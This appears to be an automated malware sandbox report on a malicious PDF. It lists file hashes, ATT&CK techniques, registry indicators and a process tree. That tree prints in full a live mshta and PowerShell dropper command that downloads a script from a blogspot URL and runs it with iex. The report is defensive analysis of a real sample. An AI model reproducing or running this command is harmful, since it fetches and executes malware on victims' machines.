1a89f1b5beda5a861dda5d01f441263a003d9133dcec0cde57a5b2e65e96f1fe

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20/03/2025, 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da.pdf
Size

40KB
MD5

9cb482f484a11d1483aa39ad189b8cc3
SHA1

e8dca89bc15a02ee70af61f76c669d55af6917ec
SHA256

68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da
SHA512

6a5e6ec234f2af41846dc8447f334c3d8a067bf1834b9b92765e5c478ade25cd7c69f25660d84f1e3b1b725c31030813cee21c1f26a880d1cacb85c34c681ddc
SSDEEP

384:PhwVVcX8YbmWG3cdW0nwcP3r+8cQe1uFHwl:5xMYbWWjPCTQe1uFHwl

Score

10^/10

discovery

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://'

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3056	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1956	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1956	AcroRd32.exe
1956	AcroRd32.exe
1956	AcroRd32.exe
1956	AcroRd32.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 2760	1956	AcroRd32.exe	31
PID 1956 wrote to memory of 2760	1956	AcroRd32.exe	31
PID 1956 wrote to memory of 2760	1956	AcroRd32.exe	31
PID 1956 wrote to memory of 2760	1956	AcroRd32.exe	31
PID 2760 wrote to memory of 3056	2760	mshta.exe	32
PID 2760 wrote to memory of 3056	2760	mshta.exe	32
PID 2760 wrote to memory of 3056	2760	mshta.exe	32
PID 2760 wrote to memory of 3056	2760	mshta.exe	32

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\68afe34da3da15dc5f12491d025db5d83109b7e2baff9ebed4722a606df886da.pdf"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" "javascript:var Skw = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://' + 'marchkala3-19-25' + '.b' + 'logspot.c' + 'om' + '/lundmurred.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], def = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ghi = new ActiveXObject(Skw[0]); ghi[Skw[1]](Skw[2], Skw[3], Skw[4], Skw[5], Skw[6]);close()"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://marchkala3-19-25.blogspot.com/lundmurred.doc) | . iex;Start-Sleep -Seconds 7;
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
a28947b5ea8931751b03086a005547ce

SHA1
a146edf350fcb02a9ba1a5cc2bba738f37a1ce6a

SHA256
b03fc153e021e968aba3da62b0fc1703683e5eb61616355241582b5174fec40b

SHA512
3518538d4a46d5ffb5d39464657148779ba16b19921e5d73037aa956ce69b7ef41d1777c50d5301d42bb7ba8065c273b8cdc71301bd48009d0ef1ce97be3431b

Download Submit